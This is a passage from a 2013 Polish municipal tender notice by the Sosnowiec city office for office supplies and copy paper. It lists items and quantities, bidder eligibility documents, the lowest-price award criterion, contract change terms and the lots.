29.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 248 (1000 sztuk - opakowanie) 	opakowanie	100	 	 
30.	Nożyczki metalowe, dł 21 cm z plastikowym uchwytem 	sztuki	10	 	 
31.	Uniwersalny marker permanentny wodoodporny, przeznaczony do stosowania na różnych powierzchniach
- czarny z okrągłą końcówką, grubość linii pisania od 1-3 mm	sztuki	10	 	 
32.	Korektor w płynie uniwersalny, szybkoschnący z gąbeczką do rozprowadzania fluidu o pojemności 20 ml	sztuki	10	 	 
33.	Korektor w taśmie, przezroczysta obudowa, szerokość taśmy około 4,2mm, poliestrowa taśma odporna na zerwanie 
o długości około 10 m	sztuki	10	 	 
34.	Klej biurowy w sztyfcie, nietoksyczny, 
bez rozpuszczalników, na bazie PVP, zmywalny za pomocą wody, do klejenia papieru, kartonu, zdjęć, gramatura - 15 g 	sztuki	100	 	 
35.	Bloczek samoprzylepny 76 x 76, karteczki w żółtym 
- neutrealnym kolorze, ilość 100 karteczek, gramatura 70gm2	bloczek	30	 	 
36.	Kostka klejona biała 8,3 x 8,3 x 5,0 cm	bloczek	30	 	 
37.	Ofertówka twarda A-4 L bezbarwna	sztuki	250	 	 
38.	Taśma klejąca, przeźroczysta - szerokość 18 mm, długość 20m	sztuki	200	 	 
39.	Koszulka na dokumenty formatu A-4 (230x300 mm), 
PP 40um, otwierana na górze, przezroczysta, antyelektrostatyczna, pasek z multiperforacją 
(100 sztuk w opakowaniu)	opakowanie	200	 	 
40.	Skoroszyt wykonany z PCV w formacie A4 (237x310mm), pojemność 200 kartek, wpinany do segregatora, przednia okładka przezroczysta, spodnia kolorowa, papierowy wysuwany pasek opisowy, dziurkowanie 11	sztuki	100	 
 41.	Przekładka do segregatora z kolorowego kartonu 160 gsm, 
do segregowania dokumentów w formacie A4, multiperforowana, z kartą opisową na 10 kart 
(10 kart w opakowaniu)	opakowanie	1	 	 
42.	Papier ksero A-4, o stopniu białości CIE 161 +- 3 (załączyć certyfikat potwierdzający stopień białości), gramatura 80gm2	ryzy	600	 	 
43.	Brulion w kratkę, szyty i klejony format A-4, twarda oprawa 96 kartkowy, gramatura kartek 55gm2	sztuki	20	 	 
44.	Koperty duże rozszerzane 458mmx300mm	sztuki	100	 	 
45.	Koperty białe z klejem, C4 (pakowane po 250 sztuk)	opakowanie	2	 	 
46.	Koperty białe z klejem, B5 (pakowane po 500 sztuk)	opakowanie	10	 	 
47.	Koperty białe bez nadruku, samoprzylepne C6 
(pakowane po 1000 sztuk)	opakowanie	40	 	 
48.	Spinacze biurowe okrągłe, metalowe, galwanizowane wielkość 28 mm, (100 sztuk w opakowaniu)	opakowanie	90	 	 
49.	Spinacze metalowe, okrągłe, galwanizowane wielkość 50 mm (100 sztuk w opakowaniu) 	opakowanie	30	 	 
50.	Tablica korkowa 90 cm szer. x 60 cm wys. 	sztuki	2	 	 
51.	Linijka przezroczysta plastikowa dł. 30 cm	sztuki	10	 
52.	Taśma typu Dalton do maszynek do liczenia, szerokość taśmy około 57 mm, dł. 30m	sztuki	10	 	 
53.	Szuflada na biurko standard, na dokumenty w formacie A4 
o wymiarach: około 364x 254x 60mm, przezroczysta	sztuki	40	 	 
54.	Przybornik na biurko z sześcioma przegrodami na artykuły biurowe, wykonany z przezroczystego tworzywa sztucznego, odpornego na pęknięcia 	sztuki	6	 	 
55.	Pinezki (pakowane po 50 sztuk)	opakowanie	2	 	 
56.	Zakładki indeksujące kolor neon, wielorazowe, 
z możliwością zapisu, ilość fiszek 5x 25 sztuk, wykonane 
z PP o grubości około 60um, wymiary (12x45mm)	opakowanie	10	 	 
57.	Papier szary w arkuszach w wielkości 70 cm x 100 cm 	arkusze	30	 	 
58.	Matowa taśma samoprzylepna z naturalnych włókien, 
w pudełku o wymiarach: około 19mmx33m typ Scotch
lub równoważna	sztuki	2	 	 
59.	Taśma klejąca, przeźroczysta - szerokość 24 mm, długość 20m	sztuki	2	 	 
Załącznik nr 2D- szczegółowy formularz oferty - dla zadania D  	                  
1.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (czarny)	szt.	80	 	 
2.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (niebieski)	szt.	60	 	 
3.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (zielony)	szt.	40	 	 
4.	Cienkopis jednorazowy, trwały tusz na bazie wody, obudowa wykonana z PP, średnica końcówki około 0,4 mm (czerwony)	szt.	40	 	 
5.	Pióro kulkowe z tuszem pigmentowym, wodoodpornym, odpornym na blaknięcia, średnica kulki ok. 0,5 mm, grubość linii pisania ok. 0,3 mm (czarny)	szt.	120	 	 
6.	Pióro kulkowe z tuszem pigmentowym, wodoodpornym, odpornym na blaknięcia, średnica kulki ok. 0,5 mm, grubość linii pisania ok. 0,3 mm (niebieski)	szt.	120	 	 
7.	Pióro kulkowe z tuszem pigmentowym, wodoodpornym, odpornym na blaknięcia, średnica kulki ok. 0,5 mm, grubość linii pisania ok. 0,3 mm (czerwony)	szt.	20	 	 
8.	Długopis automatyczny typu ZENITH 7 lub równoważny 
z wymiennym wkładem, obudowa wykonana 
z wytrzymałego i estetycznego tworzywa sztucznego, wkład w kolorze niebieskim, długość pisania min. 2500 m, grubość linii: około 0,7 mm 	szt.	60	 	 
9.	Wkład do długopisów z pozycji 8 ( niebieski) 	szt.	50	 	 
10.	Wkład do długopisów z pozycji 8 ( czarny) 	szt.	50	 	 
11.	Długopis automatyczny z wymiennym wkładem, obudowa w kolorze tuszu, wygodny gumowy uchwyt, wkład 
w kolorze niebieskim, długość pisania około 2000 m, 
trwała kulka około 1mm	szt.	80	 	 
12.	Wkład do długopisów z pozycji 11 (niebieski) 	szt.	80	 	 
13.	Ołówek automatyczny w gumowanej obudowie antypoślizgowej, z gumką chronioną skuwką, grafit 0,5mm 	szt.	20	 	 
14.	Grafity do ołówków ( 0,5) HB (12 rysików opakowanie), pasujące do ołówków w pozycji 13	opakowanie	20	 	 
15.	Ołówek drewniany odporny na złamanie z gumką, twardość HB	szt.	60	 	 
16.	Ołówek drewniany, odporny na złamanie bez gumki twardość 2B	szt.	60	 	 
17.	Gumka techniczna wykonana z termoplastycznego, syntetycznego kauczuku w kolorze białym o wymiarach 41x21x11mm	szt.	30	 	 
18.	Klej biurowy w sztyfcie, nietoksyczny, 
bez rozpuszczalników, na bazie PVP, zmywalny 
za pomocą wody, do klejenia papieru, kartonu, zdjęć, gramatura - 15 g 	szt.	40	 	 
 
19.	Temperówka metalowa	szt.	20	 	 
20.	Nożyczki metalowe, dł. 21 cm z plastikowym uchwytem 	szt.	6	 	 
21.	Zszywacz o dużej wytrzymałości, metalowy mechanizm, plastikowe ramię, zszywający na płasko typu SAX 539 
lub równoważny, zszywający do 30 kartek	szt.	15	 	 
22.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 24 na6 (1000 sztuk w opakowaniu)	opakowanie	30	 	 
23.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 24 na8 (1000 sztuk - opakowanie) 	opakowanie	30	 	 
24.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 23na13 (1000 sztuk - opakowanie) 	szt.	10	 	 
25.	Zszywki wysokiej jakości specjalistyczne do zszywaczy 
o dużej wytrzymałości 23na15 (1000 sztuk - opakowanie) 	szt.	10	 	 
26.	Dziurkacz duży i mocny z metalową obudową i podstawą, gumowa rękojeść, ogranicznik formatu, na 2 dziurki, drukuje do 65 kartek typu Sax 608 lub równoważny	szt.	16	 	 
27.	Linijka przeźroczysta 20 cm	szt.	12	 	 
28.	Linijka przeźroczysta 30 cm	szt.	12	 	 
29.	Linijka przeźroczysta 50 cm	szt.	12	 	 
30.	Korektor w taśmie, przezroczysta obudowa, szerokość taśmy około 4,2mm, poliestrowa taśma odporna 
na zerwanie o długości około 10 m	szt.	10	 	 
31.	Przybornik na biurko z sześcioma przegrodami na artykuły biurowe, wykonany z przezroczystego tworzywa sztucznego, odpornego na pęknięcia 	szt.	8	 	 
32.	Bloczek samoprzylepny 51 x 76mm, karteczki w żółtym 
- neutrealnym kolorze, ilość 100 karteczek, gramatura 70g nam2	bloczek	60
33.Bloczek samoprzylepny 38 x 51mm, karteczki w żółtym 
- neutrealnym kolorze, ilość 100 karteczek, gramatura 70gnam2	bloczek	60 
34.Bloczek samoprzylepny 76 x 76mm, karteczki w żółtym 
- neutrealnym kolorze, ilość 100 karteczek, gramatura 70g na m2	bloczek	6  
35.Bloczek samoprzylepny 76 x 127mm, karteczki w żółtym 
- neutrealnym kolorze, ilość 100 karteczek, gramatura 70g na m2	bloczek	6
36.Folia samoprzylepna przezroczysta formatu AO	szt.	30	 
37.Matowa taśma samoprzylepna z naturalnych włókien 
w pudełku o wymiarach około 19mmx33m typ Scotch 
lub równoważna	szt.	10	 	 
38.	Taśma klejąca dwustronna, pokryta obustronnie klejem akrylowym, rodzaj 38mm na 25m	szt.	10	 	 
39.	Zakładki indeksujące samoprzylepne, kolor neon, 
z możliwością robienia zapisów o wymiarze 15x50mm 
(100 kart, 5 bloczków w opakowaniu)	opakowanie	20	 	 
40.	Koperty C6 SK (samoklejące) bez nadruku białe (pakowane po 1000 szt.)	opakowanie	4	 	 
 41.	Koperty C5 SK (samoklejące) bez nadruku białe (pakowane po 500 szt.)	opakowanie	8	 	 
42.	Koperty C4 białe z klejem (pakowane po 250 szt.)	opakowanie	4	 	 
43.Koperty C4 szare z klejem (pakowane po 250 szt.)	opakowanie	44.Teczka wykonana z elastycznego, odpornego na pęknięcia PP, transparentna, zamykana na gumki narożne, pojemność około 3cm, wymiary: około 250x327mm	szt.	200	 	 
45.Teczka z gumką (biała) o gramaturze 300g formatu A4	szt.	200	 
46.Koszulka na dokumenty formatu A-4 (230x300 mm), 
PP 40um, otwierana na górze, przeźroczysta, antyelektrostatyczna, pasek z multiperforacją 
(100 sztuk w opakowaniu)	opakowanie	10	 	 
47.Segregator 75 mm formatu A4 z dźwignią z dociskaczem, oklejony na zewnątrz folią polipropylenową, wewnątrz papierem, na dolnych krawędziach metalowe okucia 
z wymienną obustronną etykietą 	szt.	15	 	 
48.Segregator 50 mm typu A4 z dźwignią z dociskaczem, oklejony na zewnątrz folią 
załącznik 2 E formularz oferty dla zadania E
1.	Papier ksero
A-3, 80gm2 -stopień białości CIE 161	ryza
500 sztuk	160	80	80		
2.	Papier ksero
A-4; 80gm2 - stopień białości CIE 161	ryza
500 sztuk	7500	2000	2000	2000	1500		
3.	Papier ksero A5 80gm2 - stopień białości CIE 161	ryza
1000 sztuk	150	50	50	50		
4.	Papier do fax	1 rolka 
216mx30mb	160
rolek	40	40	40	40		
5.	Papier A4
gramatura 200gm2 biały	ryza
250 sztuk	6	6		
6.	Papier A4
gramatura 160gm2 seledyn	ryza
250 sztuk	2	2			
7.	Papier A4
Gramatura
160gm2
błękitny	ryza
250 sztuk	2	2		
8.	Papier A4
gramatura 210gm2
kremowy	ryza
250 sztuk	4	4			
9.Papier A4 gramatura
160gm2 gołąbkowy	ryza
250 sztuk	2	2		
10.Etykiety A4 samoprzylepne	opakowanie 100 sztuk	6	3	3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.92.30-1, 30.19.76.44-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania uprawnień do wykonywania działalności w zakresie dostawy obejmującej przedmiot zamówienia, należy załączyć oświadczenie w trybie art. 22 ust. 1 pkt. 1, 2, 3, 4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.Ocena  spełnienia wymaganego warunku dokonywana  zgodnie z zasadą spełnia bądź  nie spełnia na podstawie informacji zawartych w przedłożonym dokumencie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia należy przedłożyć:
-wykaz co najmniej dwóch dostaw obejmujących dostawę artykułów biurowych, 
z podaniem ich wartości, dat wykonania i odbiorców,
-wykaz co najmniej trzech dostaw obejmujących dostawę papieru biurowego, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego dokumenty potwierdzające ,że dostawy te zostały wykonane należycie, oraz także oświadczenie w trybie art. 22 ust. 1 pkt. 1, 2, 3, 4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.
Ocena  spełnienia wymaganego warunku dokonywana  zgodnie z zasadą spełnia bądź  nie spełnia na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć:
wykaz co najmniej dwóch dostaw obejmujących dostawę artykułów biurowych, 
z podaniem ich wartości, dat wykonania i odbiorców,
wykaz co najmniej trzech dostaw obejmujących dostawę papieru biurowego, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.oraz także oświadczenie w trybie art. 22 ust. 1 pkt. 1, 2, 3, 4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.
Ocena  spełnienia wymaganego warunku dokonywana  zgodnie z zasadą spełnia bądź  nie spełnia na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć:
wykaz co najmniej dwóch dostaw obejmujących dostawę artykułów biurowych, 
z podaniem ich wartości, dat wykonania i odbiorców,
wykaz co najmniej trzech dostaw obejmujących dostawę papieru biurowego, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.oraz także oświadczenie w trybie art. 22 ust. 1 pkt. 1, 2, 3, 4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.
Ocena  spełnienia wymaganego warunku dokonywana  zgodnie z zasadą spełnia bądź  nie spełnia na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku znajdowania się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia należy załączyć oświadczenie w trybie art. 22 ust. 1 pkt. 1, 2, 3, 4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie 
z art. 233 § 1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność 
za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego
Ocena  spełnienia wymaganego warunku dokonywana  zgodnie z zasadą spełnia bądź  nie spełnia na podstawie informacji zawartych w przedłożonym dokumencie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">certyfikat białości papieru CIE 161 z tolerancją + -2 lub + -3 dla pozycji  nr 1,2,3 załącznika 2E, oraz  w pozycji 42 załącznika 2C</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>WARUNKI ZMIANY: 
a)Wynagrodzenie przysługujące Wykonawcy w związku z realizacją niniejszej umowy, podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą 
ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. 
W takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalana 
jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej 
na dzień wystawienia faktury.
b)W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy 
nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu
al. Zwycięstwa 20
41-200 Sosnowiec
Pokój 502 D -Wydział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu
al. Zwycięstwa 20
41-200 Sosnowiec
Pokój 502 D -Wydział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pozycje od 1 do 113 w zadaniu A -załącznik 2A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pozycje wskazane w załączniku  2B od nr 1 do nr 12..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów biurowych na potrzeby Referatu Gospodarki Odpadami Komunalnymi - zadanie C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów w pozycjach od 1 do 59 załącznika 2C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
